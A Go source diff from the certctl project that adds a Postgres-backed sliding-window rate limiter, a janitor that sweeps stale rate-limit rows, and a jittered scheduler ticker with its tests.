// Per CLAUDE.md "the repo is truth" principle, code grounded against
|
||||||
|
// the live signature (not the prompt's draft).
|
||||||
|
type Limiter interface {
	// Allow records one request for key at instant now. It returns
	// ErrRateLimited when the configured cap is exceeded inside the
	// configured window, and nil otherwise.
	//
	// An empty key short-circuits to nil. This is defense-in-depth for
	// the caller: upstream validation should reject empty-key events
	// first, and a single shared bucket for the empty key would be a
	// chokepoint for every empty-key event.
	//
	// A disabled limiter (maxN <= 0) returns nil for every call.
	Allow(key string, now time.Time) error
}
|
||||||
|
|
||||||
|
// Compile-time interface satisfaction checks. Drift in either
|
||||||
|
// backend's Allow signature fails the build at this file before any
|
||||||
|
// caller breaks.
|
||||||
|
var (
|
||||||
|
_ Limiter = (*SlidingWindowLimiter)(nil)
|
||||||
|
_ Limiter = (*PostgresSlidingWindowLimiter)(nil)
|
||||||
|
)
|
||||||
@@ -0,0 +1,71 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"database/sql"
|
||||||
|
"fmt"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.3 closure (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1): the scheduler-invoked janitor for the postgres-backed
|
||||||
|
// rate-limit bucket table. Sweeps rows whose updated_at is older than
|
||||||
|
// the longest configured window any caller uses — these rows can
|
||||||
|
// never be at-cap (every timestamp inside has aged past the window),
|
||||||
|
// so dropping them entirely is safe.
|
||||||
|
//
|
||||||
|
// The in-memory backend's prune-on-Allow path keeps buckets short-
|
||||||
|
// lived without a separate sweep; this file is postgres-only.
|
||||||
|
|
||||||
|
// PostgresGC is the janitor for the rate_limit_buckets table. It is
// built on the same *sql.DB the postgres limiters use and exposes a
// single GarbageCollect method, which is the shape the scheduler's
// RateLimitGarbageCollector interface asks for.
type PostgresGC struct {
	db        *sql.DB       // handle the sweep DELETE is issued on
	maxWindow time.Duration // rows idle for longer than this are swept; <= 0 disables the sweep
}

// NewPostgresGC builds a janitor that removes rows whose updated_at
// lies more than maxWindow in the past. maxWindow should be the
// longest window any limiter in the deployment is configured with
// (the original note cites 24h for the EST per-principal limiter);
// raise it when a caller with a longer window is introduced.
//
// A maxWindow <= 0 turns GarbageCollect into a no-op. That is the
// operator opt-out for deployments that run the postgres backend but
// do not want the sweep.
func NewPostgresGC(db *sql.DB, maxWindow time.Duration) *PostgresGC {
	gc := new(PostgresGC)
	gc.db = db
	gc.maxWindow = maxWindow
	return gc
}

// GarbageCollect removes every rate_limit_buckets row whose
// updated_at is earlier than time.Now() minus maxWindow and reports
// how many rows were removed.
//
// The sweep is one DELETE statement; the file's original note says it
// is served by the rate_limit_buckets_updated_at_idx index from
// migration 000046. A failed DELETE is returned wrapped. A driver that
// cannot report RowsAffected is not treated as a failure, because the
// DELETE has already run by then; the count is reported as 0.
func (g *PostgresGC) GarbageCollect(ctx context.Context) (int64, error) {
	const deleteStaleSQL = `
		DELETE FROM rate_limit_buckets
		WHERE updated_at < $1
	`

	// Disabled janitor: never touch the database.
	if g.maxWindow <= 0 {
		return 0, nil
	}

	staleBefore := time.Now().Add(-g.maxWindow)
	result, execErr := g.db.ExecContext(ctx, deleteStaleSQL, staleBefore)
	if execErr != nil {
		return 0, fmt.Errorf("ratelimit-gc: delete stale buckets: %w", execErr)
	}

	if deleted, countErr := result.RowsAffected(); countErr == nil {
		return deleted, nil
	}
	// Deliberately best-effort: the rows are gone even though the
	// driver could not tell us how many.
	return 0, nil
}
|
||||||
@@ -0,0 +1,228 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package ratelimit
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"database/sql"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/lib/pq"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 13 Sprint 13.2 closure (2026-05-14, architecture diligence audit
|
||||||
|
// ARCH-M1): the cross-replica-consistent rate-limit backend. Same
|
||||||
|
// algorithm as SlidingWindowLimiter (prune-on-Allow sliding-window log)
|
||||||
|
// but the state lives in postgres so N replicas see the same per-key
|
||||||
|
// bucket. Replaces the per-process in-memory limit when the operator
|
||||||
|
// sets CERTCTL_RATE_LIMIT_BACKEND=postgres (wired in Sprint 13.3).
|
||||||
|
//
|
||||||
|
// Algorithm
|
||||||
|
// =========
|
||||||
|
// Each Allow call runs a single BEGIN/COMMIT transaction:
|
||||||
|
//
|
||||||
|
// 1. INSERT ... ON CONFLICT (bucket_key) DO NOTHING — ensure the
|
||||||
|
// row exists so the SELECT FOR UPDATE below has something to lock.
|
||||||
|
// 2. SELECT timestamps FROM rate_limit_buckets WHERE bucket_key=$1
|
||||||
|
// FOR UPDATE — acquire the per-key row lock for the rest of the
|
||||||
|
// transaction.
|
||||||
|
// 3. Prune timestamps older than (now - window) in Go (reusing the
|
||||||
|
// unexported pruneOlderThan helper shared with SlidingWindowLimiter
|
||||||
|
// — single source of truth for the prune semantics).
|
||||||
|
// 4. If cardinality(pruned) >= maxN: persist the pruned state without
|
||||||
|
// appending, COMMIT, return ErrRateLimited.
|
||||||
|
// 5. Else: append `now`, persist, COMMIT, return nil.
|
||||||
|
//
|
||||||
|
// SELECT FOR UPDATE serializes Allow calls for the same key across
|
||||||
|
// replicas: replicas A and B firing simultaneous Allow("k") never
|
||||||
|
// race because Postgres' row-lock arbitrates. This is the entire
|
||||||
|
// reason for the close — the memory backend's sync.Mutex only
|
||||||
|
// arbitrates within a process; pg's row lock arbitrates the cluster.
|
||||||
|
//
|
||||||
|
// Why a transaction (not a single CTE)
|
||||||
|
// ====================================
|
||||||
|
// A "compute everything in one SQL statement" approach using
|
||||||
|
// INSERT ... ON CONFLICT DO UPDATE SET timestamps = CASE WHEN ... is
|
||||||
|
// possible but the conditional logic to gate the append on the
|
||||||
|
// pruned-cardinality requires nested CTEs whose check-then-act
|
||||||
|
// semantics are hard to read + harder to convince yourself are
|
||||||
|
// race-free across all isolation levels. The explicit transaction
|
||||||
|
// version above is correct under READ COMMITTED (Postgres' default),
|
||||||
|
// matches the memory backend's read-decide-write shape line-for-line,
|
||||||
|
// and shares the same prune helper. Two extra round-trips per Allow
|
||||||
|
// vs one is acceptable for the rate-limit hot path — the operation
|
||||||
|
// is gated anyway.
|
||||||
|
//
|
||||||
|
// Sprint 13.3 will wire the scheduler janitor loop that GCs rows
|
||||||
|
// whose updated_at is older than the longest configured window; the
|
||||||
|
// migration ships the supporting btree index on updated_at.
|
||||||
|
|
||||||
|
// PostgresSlidingWindowLimiter is the Limiter implementation whose
// state lives in the rate_limit_buckets table (migration 000046).
//
// Build it with NewPostgresSlidingWindowLimiter; the zero value has
// no db handle and is NOT usable.
//
// Concurrency: Allow may be called from many goroutines and from many
// replicas at once. Per-key access is serialized by the row lock that
// Allow takes with SELECT ... FOR UPDATE.
type PostgresSlidingWindowLimiter struct {
	db       *sql.DB       // shared connection pool; must outlive the limiter
	maxN     int           // per-key cap inside one window
	window   time.Duration // sliding-window length
	disabled bool          // true when maxN <= 0; every Allow call then returns nil
}

// NewPostgresSlidingWindowLimiter builds a limiter with the given
// per-key cap and window.
//
//   - maxN <= 0 disables the limiter: every Allow call returns nil.
//   - window <= 0 falls back to 24h.
//
// db is required and must outlive the limiter. The constructor does
// not touch the database; the table is expected to have been created
// by migration 000046_rate_limit_buckets.up.sql.
func NewPostgresSlidingWindowLimiter(db *sql.DB, maxN int, window time.Duration) *PostgresSlidingWindowLimiter {
	lim := &PostgresSlidingWindowLimiter{
		db:       db,
		maxN:     maxN,
		window:   24 * time.Hour,
		disabled: maxN <= 0,
	}
	if window > 0 {
		lim.window = window
	}
	return lim
}
|
||||||
|
|
||||||
|
// Allow records a request at the given (key, now) and returns
|
||||||
|
// ErrRateLimited if the configured cap is exceeded inside the
|
||||||
|
// configured window. Matches SlidingWindowLimiter.Allow byte-for-byte
|
||||||
|
// in caller-visible semantics so Sprint 13.3's backend-selector swap
|
||||||
|
// is signature-clean.
|
||||||
|
//
|
||||||
|
// The `now` argument is the timestamp the call is "happening at".
|
||||||
|
// Used as the prune cutoff (entries older than now-window are dropped)
|
||||||
|
// and as the new appended entry. Tests pass synthetic `now` values
|
||||||
|
// to exercise window-expiry deterministically; production call sites
|
||||||
|
// pass time.Now() (matching how SlidingWindowLimiter is invoked
|
||||||
|
// today — see internal/api/handler/{est,export,certificates,
|
||||||
|
// auth_breakglass}.go).
|
||||||
|
//
|
||||||
|
// Empty `key` short-circuits to nil (matches the memory backend's
|
||||||
|
// chokepoint-avoidance contract).
|
||||||
|
func (l *PostgresSlidingWindowLimiter) Allow(key string, now time.Time) error {
|
||||||
|
if l.disabled {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if key == "" {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
tx, err := l.db.BeginTx(ctx, &sql.TxOptions{Isolation: sql.LevelReadCommitted})
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("ratelimit: begin tx: %w", err)
|
||||||
|
}
|
||||||
|
defer func() {
|
||||||
|
// Rollback is a no-op once the tx is committed; safe to defer
|
||||||
|
// unconditionally for the error paths.
|
||||||
|
_ = tx.Rollback()
|
||||||
|
}()
|
||||||
|
|
||||||
|
// Step 1: ensure the row exists so SELECT FOR UPDATE has something
|
||||||
|
// to lock. ON CONFLICT DO NOTHING is a no-op when the row already
|
||||||
|
// exists.
|
||||||
|
if _, err := tx.ExecContext(ctx, `
|
||||||
|
INSERT INTO rate_limit_buckets (bucket_key, timestamps, updated_at)
|
||||||
|
VALUES ($1, '{}', $2)
|
||||||
|
ON CONFLICT (bucket_key) DO NOTHING
|
||||||
|
`, key, now); err != nil {
|
||||||
|
return fmt.Errorf("ratelimit: ensure row: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 2: lock the row + read current state. lib/pq cannot scan a
|
||||||
|
// TIMESTAMPTZ[] column back into []time.Time directly: time.Time
|
||||||
|
// does not implement sql.Scanner, and pq.GenericArray's per-element
|
||||||
|
// scan path calls Scan() (not database/sql's convertAssign), so the
|
||||||
|
// inner Scan fails with
|
||||||
|
// "pq: scanning to time.Time is not implemented; only sql.Scanner".
|
||||||
|
// Workaround: ask Postgres to format each timestamp as a canonical
|
||||||
|
// ISO 8601 UTC string via to_char(... AT TIME ZONE 'UTC', ...), read
|
||||||
|
// the column as text[] via pq.StringArray (well-supported), and
|
||||||
|
// parse Go-side. The to_char format is fully deterministic (6-digit
|
||||||
|
// microseconds, "T" separator, "Z" suffix) regardless of the
|
||||||
|
// session's DateStyle / TimeZone settings.
|
||||||
|
const pgTimestampLayout = "2006-01-02T15:04:05.000000Z"
|
||||||
|
var tsStrings pq.StringArray
|
||||||
|
if err := tx.QueryRowContext(ctx, `
|
||||||
|
SELECT COALESCE(
|
||||||
|
ARRAY(
|
||||||
|
SELECT to_char(t AT TIME ZONE 'UTC', 'YYYY-MM-DD"T"HH24:MI:SS.US"Z"')
|
||||||
|
FROM unnest(timestamps) AS t
|
||||||
|
),
|
||||||
|
ARRAY[]::text[]
|
||||||
|
)
|
||||||
|
FROM rate_limit_buckets
|
||||||
|
WHERE bucket_key = $1
|
||||||
|
FOR UPDATE
|
||||||
|
`, key).Scan(&tsStrings); err != nil {
|
||||||
|
// Shouldn't happen — step 1 ensured the row exists. Treat
|
||||||
|
// the sql.ErrNoRows path as a no-op (be conservative; never
|
||||||
|
// over-limit on transient DB weirdness).
|
||||||
|
if errors.Is(err, sql.ErrNoRows) {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return fmt.Errorf("ratelimit: select-for-update: %w", err)
|
||||||
|
}
|
||||||
|
ts := make([]time.Time, 0, len(tsStrings))
|
||||||
|
for _, s := range tsStrings {
|
||||||
|
parsed, err := time.Parse(pgTimestampLayout, s)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("ratelimit: parse stored timestamp %q: %w", s, err)
|
||||||
|
}
|
||||||
|
ts = append(ts, parsed.UTC())
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 3: prune in Go via the shared helper. Same prune semantics
|
||||||
|
// as SlidingWindowLimiter — single source of truth.
|
||||||
|
cutoff := now.Add(-l.window)
|
||||||
|
pruned := pruneOlderThan(ts, cutoff)
|
||||||
|
|
||||||
|
// Step 4: decide.
|
||||||
|
rateLimited := len(pruned) >= l.maxN
|
||||||
|
if !rateLimited {
|
||||||
|
pruned = append(pruned, now)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 5: persist.
|
||||||
|
if _, err := tx.ExecContext(ctx, `
|
||||||
|
UPDATE rate_limit_buckets
|
||||||
|
SET timestamps = $2, updated_at = $3
|
||||||
|
WHERE bucket_key = $1
|
||||||
|
`, key, pq.Array(pruned), now); err != nil {
|
||||||
|
return fmt.Errorf("ratelimit: update: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if err := tx.Commit(); err != nil {
|
||||||
|
return fmt.Errorf("ratelimit: commit: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if rateLimited {
|
||||||
|
return ErrRateLimited
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Disabled reports whether the limiter is in opt-out mode (maxN <= 0).
|
||||||
|
// Mirrors SlidingWindowLimiter.Disabled() so handler-side gating +
|
||||||
|
// admin-endpoint observability can ask the same question of either
|
||||||
|
// backend.
|
||||||
|
func (l *PostgresSlidingWindowLimiter) Disabled() bool {
|
||||||
|
return l.disabled
|
||||||
|
}
|
||||||
@@ -0,0 +1,120 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package scheduler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"math/rand/v2"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// JitteredTicker is a bounded-jitter wrapper around time.Timer that
|
||||||
|
// fires on C once per interval ± jitterPct, with the jitter drawn
|
||||||
|
// fresh on every tick. The base interval is the same as a bare
|
||||||
|
// time.NewTicker; only the per-tick envelope changes. This preserves
|
||||||
|
// every loop's expected SLO (a renewal scan still runs ~once per
|
||||||
|
// hour) while breaking up the co-fire pattern that bare tickers
|
||||||
|
// produce when multiple loops share a nominal cadence.
|
||||||
|
//
|
||||||
|
// Stop must be called by the caller (typically via defer) to release
|
||||||
|
// the goroutine. After Stop, the C channel is closed.
|
||||||
|
//
|
||||||
|
// Phase 6 SCALE-M5 (2026-05-14) introduced this wrapper. Pre-Phase-6
|
||||||
|
// the 15 scheduler loops in scheduler.go each used a bare
|
||||||
|
// time.NewTicker(interval); when multiple loops shared a nominal
|
||||||
|
// cadence (e.g. several loops on a 1h interval), they co-fired at
|
||||||
|
// the same wall-clock boundary post-server-start, producing visible
|
||||||
|
// CPU + DB spikes at every hour boundary. The renewal scan + the
|
||||||
|
// agent health check + the digest preview all firing within
|
||||||
|
// milliseconds of each other on a freshly-booted server could
|
||||||
|
// saturate the connection pool until they completed.
|
||||||
|
type JitteredTicker struct {
|
||||||
|
// C is the channel a tick fires on. Read this in the loop's
|
||||||
|
// select{} the same way you'd read time.Ticker.C.
|
||||||
|
C chan time.Time
|
||||||
|
|
||||||
|
stopCh chan struct{}
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewJitteredTicker returns a ticker that fires on C every
|
||||||
|
// interval ± jitterPct (e.g. jitterPct=0.1 = ±10%). The first tick
|
||||||
|
// arrives one (jittered) interval after construction — same as
|
||||||
|
// time.NewTicker. jitterPct < 0 is treated as 0 (no jitter, equivalent
|
||||||
|
// to time.NewTicker). jitterPct ≥ 1 is clamped to 0.99 (avoid the
|
||||||
|
// degenerate "instant tick" case where the jitter consumes the
|
||||||
|
// entire interval).
|
||||||
|
//
|
||||||
|
// interval must be > 0. Callers passing 0 or negative get a panic
|
||||||
|
// from time.NewTimer, matching time.NewTicker's existing contract.
|
||||||
|
func NewJitteredTicker(interval time.Duration, jitterPct float64) *JitteredTicker {
|
||||||
|
if jitterPct < 0 {
|
||||||
|
jitterPct = 0
|
||||||
|
}
|
||||||
|
if jitterPct >= 1 {
|
||||||
|
jitterPct = 0.99
|
||||||
|
}
|
||||||
|
|
||||||
|
jt := &JitteredTicker{
|
||||||
|
C: make(chan time.Time, 1),
|
||||||
|
stopCh: make(chan struct{}),
|
||||||
|
}
|
||||||
|
|
||||||
|
go jt.run(interval, jitterPct)
|
||||||
|
return jt
|
||||||
|
}
|
||||||
|
|
||||||
|
// run owns the per-tick scheduling loop. The fresh-per-tick jitter
|
||||||
|
// draw prevents drift from compounding (vs. computing the jittered
|
||||||
|
// interval once and reusing it).
|
||||||
|
func (jt *JitteredTicker) run(interval time.Duration, jitterPct float64) {
|
||||||
|
defer close(jt.C)
|
||||||
|
|
||||||
|
for {
|
||||||
|
// Bounded-symmetric jitter around the interval. delta ∈
|
||||||
|
// [-jitterPct, +jitterPct) drawn fresh per tick.
|
||||||
|
delta := (rand.Float64()*2 - 1) * jitterPct
|
||||||
|
next := time.Duration(float64(interval) * (1 + delta))
|
||||||
|
// Floor at 1ns so we never feed a zero or negative
|
||||||
|
// duration into time.NewTimer; the jitterPct clamp above
|
||||||
|
// keeps next > 0 in normal use but a Float64 rounding
|
||||||
|
// edge case could otherwise produce 0.
|
||||||
|
if next < time.Nanosecond {
|
||||||
|
next = time.Nanosecond
|
||||||
|
}
|
||||||
|
|
||||||
|
timer := time.NewTimer(next)
|
||||||
|
select {
|
||||||
|
case t := <-timer.C:
|
||||||
|
select {
|
||||||
|
case jt.C <- t:
|
||||||
|
// emitted
|
||||||
|
case <-jt.stopCh:
|
||||||
|
return
|
||||||
|
}
|
||||||
|
case <-jt.stopCh:
|
||||||
|
if !timer.Stop() {
|
||||||
|
<-timer.C
|
||||||
|
}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Stop releases the goroutine + closes C. Safe to call multiple
|
||||||
|
// times; subsequent calls are no-ops (the stopCh close is the
|
||||||
|
// only side effect, and re-closing a closed channel would panic,
|
||||||
|
// so we guard via a select+default).
|
||||||
|
func (jt *JitteredTicker) Stop() {
|
||||||
|
select {
|
||||||
|
case <-jt.stopCh:
|
||||||
|
// already closed; no-op
|
||||||
|
default:
|
||||||
|
close(jt.stopCh)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// DefaultSchedulerJitter is the jitterPct applied to every
// scheduler-loop ticker: each tick lands within ±10% of the loop's
// nominal interval. That spreads co-firing loops apart while keeping
// every loop close to its configured cadence.
const DefaultSchedulerJitter = 0.10
|
||||||
@@ -0,0 +1,198 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package scheduler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"math"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 6 SCALE-M5 contract pin (2026-05-14): JitteredTicker fires
|
||||||
|
// ~interval per tick with a bounded ±jitterPct envelope. The tests
|
||||||
|
// below are timing-sensitive but use generous tolerances + averaging
|
||||||
|
// across many ticks to stay stable under CI load.
|
||||||
|
|
||||||
|
func TestJitteredTicker_BoundedEnvelope(t *testing.T) {
|
||||||
|
const (
|
||||||
|
interval = 20 * time.Millisecond
|
||||||
|
jitterPct = 0.20 // ±20%
|
||||||
|
ticks = 30
|
||||||
|
)
|
||||||
|
|
||||||
|
jt := NewJitteredTicker(interval, jitterPct)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
last := time.Now()
|
||||||
|
for i := 0; i < ticks; i++ {
|
||||||
|
select {
|
||||||
|
case now := <-jt.C:
|
||||||
|
gap := now.Sub(last)
|
||||||
|
last = now
|
||||||
|
|
||||||
|
// Bounded envelope: every tick should fall within
|
||||||
|
// [interval × (1-jitter), interval × (1+jitter)] plus a
|
||||||
|
// generous scheduling-slop tolerance for the test
|
||||||
|
// runtime. The first tick is allowed wider slop since
|
||||||
|
// goroutine startup may eat into the first interval.
|
||||||
|
minGap := time.Duration(float64(interval) * (1 - jitterPct))
|
||||||
|
maxGap := time.Duration(float64(interval)*(1+jitterPct)) + 50*time.Millisecond
|
||||||
|
if i == 0 {
|
||||||
|
minGap = 0 // first tick can land arbitrarily fast under CI scheduling pressure
|
||||||
|
}
|
||||||
|
|
||||||
|
if gap < minGap || gap > maxGap {
|
||||||
|
t.Errorf("tick %d gap=%v outside envelope [%v, %v]", i, gap, minGap, maxGap)
|
||||||
|
}
|
||||||
|
case <-time.After(5 * interval):
|
||||||
|
t.Fatalf("tick %d timed out (>5×interval); JitteredTicker stuck", i)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_MeanCloseToInterval(t *testing.T) {
|
||||||
|
// Statistical pin: across many ticks the mean gap should be
|
||||||
|
// reasonably close to the nominal interval. Larger deviations
|
||||||
|
// indicate the jitter draw is biased (e.g. only producing
|
||||||
|
// positive deltas because of a sign bug — mean would drift to
|
||||||
|
// interval × 1.3 instead of staying near interval × 1.0).
|
||||||
|
//
|
||||||
|
// The 50ms interval + 50-tick sample is chosen so per-scheduler-
|
||||||
|
// quantum jitter (~1ms on Linux) is < 2% of the interval; the
|
||||||
|
// 30% bound below is generous enough for CI scheduling noise
|
||||||
|
// while still catching sign bugs (which would push mean drift
|
||||||
|
// past 30% trivially).
|
||||||
|
const (
|
||||||
|
interval = 50 * time.Millisecond
|
||||||
|
jitterPct = 0.30
|
||||||
|
ticks = 50
|
||||||
|
)
|
||||||
|
|
||||||
|
jt := NewJitteredTicker(interval, jitterPct)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
gaps := make([]time.Duration, 0, ticks)
|
||||||
|
last := time.Now()
|
||||||
|
|
||||||
|
for i := 0; i < ticks; i++ {
|
||||||
|
select {
|
||||||
|
case now := <-jt.C:
|
||||||
|
if i > 0 { // skip first gap (goroutine warmup)
|
||||||
|
gaps = append(gaps, now.Sub(last))
|
||||||
|
}
|
||||||
|
last = now
|
||||||
|
case <-time.After(5 * interval):
|
||||||
|
t.Fatalf("tick %d timed out", i)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
var sum time.Duration
|
||||||
|
for _, g := range gaps {
|
||||||
|
sum += g
|
||||||
|
}
|
||||||
|
mean := sum / time.Duration(len(gaps))
|
||||||
|
|
||||||
|
// Sign-bug threshold: a healthy jittered ticker should produce
|
||||||
|
// mean ≈ interval (mean drift < 10%). A sign bug (e.g.
|
||||||
|
// always-positive jitter) shifts mean to interval × (1 +
|
||||||
|
// jitterPct / 2) = +15%. 30% bound catches that while
|
||||||
|
// tolerating CI scheduling noise + the (1 - x) vs (1 + x)
|
||||||
|
// asymmetry of multiplicative jitter.
|
||||||
|
driftPct := math.Abs(float64(mean-interval)) / float64(interval)
|
||||||
|
if driftPct > 0.30 {
|
||||||
|
t.Errorf("mean gap %v drifts %.1f%% from nominal interval %v (>30%% threshold)", mean, driftPct*100, interval)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_Stop_ReleasesGoroutine(t *testing.T) {
|
||||||
|
jt := NewJitteredTicker(50*time.Millisecond, 0.10)
|
||||||
|
|
||||||
|
// Stop immediately, before any tick fires.
|
||||||
|
jt.Stop()
|
||||||
|
|
||||||
|
// C should close within one tick interval. If it doesn't, the
|
||||||
|
// goroutine is stuck (which would leak in production).
|
||||||
|
select {
|
||||||
|
case _, ok := <-jt.C:
|
||||||
|
if ok {
|
||||||
|
// A tick fired before C closed — also acceptable, but
|
||||||
|
// drain it and re-check that close follows.
|
||||||
|
select {
|
||||||
|
case _, ok2 := <-jt.C:
|
||||||
|
if ok2 {
|
||||||
|
t.Errorf("JitteredTicker.C still emitting after Stop()")
|
||||||
|
}
|
||||||
|
case <-time.After(200 * time.Millisecond):
|
||||||
|
t.Errorf("JitteredTicker.C did not close after Stop()")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
case <-time.After(200 * time.Millisecond):
|
||||||
|
t.Errorf("JitteredTicker.C did not close within 200ms of Stop()")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_Stop_Idempotent(t *testing.T) {
|
||||||
|
jt := NewJitteredTicker(50*time.Millisecond, 0.10)
|
||||||
|
|
||||||
|
// Multiple Stop() calls must not panic.
|
||||||
|
jt.Stop()
|
||||||
|
jt.Stop()
|
||||||
|
jt.Stop()
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_ZeroJitter_BehavesLikeTicker(t *testing.T) {
|
||||||
|
// jitterPct=0 reduces to a deterministic ticker. The mean
|
||||||
|
// should be exactly the interval (modulo scheduling noise).
|
||||||
|
const (
|
||||||
|
interval = 20 * time.Millisecond
|
||||||
|
ticks = 10
|
||||||
|
)
|
||||||
|
|
||||||
|
jt := NewJitteredTicker(interval, 0)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
last := time.Now()
|
||||||
|
for i := 0; i < ticks; i++ {
|
||||||
|
select {
|
||||||
|
case now := <-jt.C:
|
||||||
|
gap := now.Sub(last)
|
||||||
|
last = now
|
||||||
|
// Allow generous slop for CI scheduling.
|
||||||
|
if i > 0 && (gap < interval/2 || gap > interval*3) {
|
||||||
|
t.Errorf("zero-jitter tick %d gap=%v far from interval=%v", i, gap, interval)
|
||||||
|
}
|
||||||
|
case <-time.After(5 * interval):
|
||||||
|
t.Fatalf("zero-jitter tick %d timed out", i)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_NegativeJitter_TreatedAsZero(t *testing.T) {
|
||||||
|
// Defensive: negative jitterPct should not produce
|
||||||
|
// negative-duration timers (which would panic time.NewTimer).
|
||||||
|
jt := NewJitteredTicker(10*time.Millisecond, -0.5)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
// Just confirm at least one tick fires without panic.
|
||||||
|
select {
|
||||||
|
case <-jt.C:
|
||||||
|
// ok
|
||||||
|
case <-time.After(100 * time.Millisecond):
|
||||||
|
t.Errorf("negative-jitter ticker produced no tick within 100ms")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestJitteredTicker_LargeJitter_ClampedBelowOne(t *testing.T) {
|
||||||
|
// Defensive: jitterPct≥1 would otherwise allow next=0 and panic
|
||||||
|
// time.NewTimer. Confirm the ticker still fires.
|
||||||
|
jt := NewJitteredTicker(10*time.Millisecond, 1.5)
|
||||||
|
defer jt.Stop()
|
||||||
|
|
||||||
|
select {
|
||||||
|
case <-jt.C:
|
||||||
|
// ok
|
||||||
|
case <-time.After(100 * time.Millisecond):
|
||||||
|
t.Errorf("over-clamped-jitter ticker produced no tick within 100ms")
|
||||||
|
}
|
||||||
|
}
|
||||||
+105
-15
@@ -103,6 +103,21 @@ type BCLReplayGarbageCollector interface {
|
|||||||
SweepExpired(ctx context.Context, now time.Time) (int, error)
|
SweepExpired(ctx context.Context, now time.Time) (int, error)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// RateLimitGarbageCollector is the scheduler's view of the janitor
// that sweeps stale rows out of the rate_limit_buckets table
// (migration 000046). It is wired only when
// CERTCTL_RATE_LIMIT_BACKEND=postgres; the concrete implementation is
// *ratelimit.PostgresGC. Added in Phase 13 Sprint 13.3 (ARCH-M1
// closure completion).
//
// GarbageCollect returns the number of rows it deleted so the sweep
// loop can report it in its logs.
type RateLimitGarbageCollector interface {
	GarbageCollect(ctx context.Context) (int64, error)
}
|
||||||
|
|
||||||
// JobReaperService defines the interface for job timeout reaping used by the scheduler.
|
// JobReaperService defines the interface for job timeout reaping used by the scheduler.
|
||||||
type JobReaperService interface {
|
type JobReaperService interface {
|
||||||
ReapTimedOutJobs(ctx context.Context, csrTTL, approvalTTL time.Duration) error
|
ReapTimedOutJobs(ctx context.Context, csrTTL, approvalTTL time.Duration) error
|
||||||
@@ -130,6 +145,7 @@ type Scheduler struct {
|
|||||||
acmeGC ACMEGarbageCollector
|
acmeGC ACMEGarbageCollector
|
||||||
sessionGC SessionGarbageCollector
|
sessionGC SessionGarbageCollector
|
||||||
bclReplayGC BCLReplayGarbageCollector
|
bclReplayGC BCLReplayGarbageCollector
|
||||||
|
rateLimitGC RateLimitGarbageCollector
|
||||||
jobReaper JobReaperService
|
jobReaper JobReaperService
|
||||||
logger *slog.Logger
|
logger *slog.Logger
|
||||||
|
|
||||||
@@ -149,6 +165,7 @@ type Scheduler struct {
|
|||||||
jobTimeoutInterval time.Duration
|
jobTimeoutInterval time.Duration
|
||||||
acmeGCInterval time.Duration
|
acmeGCInterval time.Duration
|
||||||
sessionGCInterval time.Duration
|
sessionGCInterval time.Duration
|
||||||
|
rateLimitGCInterval time.Duration
|
||||||
// agentOfflineJobTTL: per-tick threshold for reaping Running jobs whose
|
// agentOfflineJobTTL: per-tick threshold for reaping Running jobs whose
|
||||||
// owning agent has been silent. Bundle C / Audit M-016. Defaults below.
|
// owning agent has been silent. Bundle C / Audit M-016. Defaults below.
|
||||||
agentOfflineJobTTL time.Duration
|
agentOfflineJobTTL time.Duration
|
||||||
